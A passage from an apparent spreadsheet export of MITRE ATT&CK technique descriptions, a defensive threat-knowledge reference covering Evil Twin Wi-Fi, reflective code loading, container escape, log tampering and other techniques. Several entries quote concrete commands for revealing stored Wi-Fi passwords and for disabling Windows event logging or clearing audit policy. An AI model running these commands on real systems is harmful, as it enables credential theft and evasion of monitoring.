    <t>Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)
By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin)  Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. 
Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.
Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.
https://attack.mitre.org/techniques/T1557/004</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>Reflective Code Loading</t>
  </si>
  <si>
    <t>Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).
Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)
Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)
https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>T1016.002</t>
  </si>
  <si>
    <t>Wi-Fi Discovery</t>
  </si>
  <si>
    <t>Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>T1480.002</t>
  </si>
  <si>
    <t>Mutual Exclusion</t>
  </si>
  <si>
    <t>Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
https://attack.mitre.org/techniques/T1480/002</t>
  </si>
  <si>
    <t>T1564.011</t>
  </si>
  <si>
    <t>Ignore Process Interrupts</t>
  </si>
  <si>
    <t>Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. 
Adversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.
Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.
https://attack.mitre.org/techniques/T1564/011</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.
https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.
https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)
Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)
Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)
https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to &lt;code&gt;Security Settings\Local Policies\Audit Policy&lt;/code&gt; for basic audit policy settings or &lt;code&gt;Security Settings\Advanced Audit Policy Configuration&lt;/code&gt; for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) &lt;code&gt;auditpol.exe&lt;/code&gt; may also be used to set audit policies.(Citation: auditpol)
Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the &lt;code&gt;Set-Service -Name EventLog -Status Stopped&lt;/code&gt; or &lt;code&gt;sc config eventlog start=disabled&lt;/code&gt; commands (followed by manually stopping the service using &lt;code&gt;Stop-Service  -Name EventLog&lt;/code&gt;).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog&lt;/code&gt; then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)
There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security&lt;/code&gt;, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application&lt;/code&gt; to disable the entire EventLog.(Citation: disable_win_evt_logging)
Additionally, adversaries may use &lt;code&gt;auditpol&lt;/code&gt; and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the &lt;code&gt;/success&lt;/code&gt; or &lt;code&gt;/failure&lt;/code&gt; parameters. For example, &lt;code&gt;auditpol /set /category:”Account Logon” /success:disable /failure:disable&lt;/code&gt; turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: &lt;code&gt;auditpol /clear /y&lt;/code&gt; or &lt;code&gt;auditpol /remove /allusers&lt;/code&gt;.(Citation: T1562.002_redcanaryco)
By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.
https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)
https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities
https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Upload Tool</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.
https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.
https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
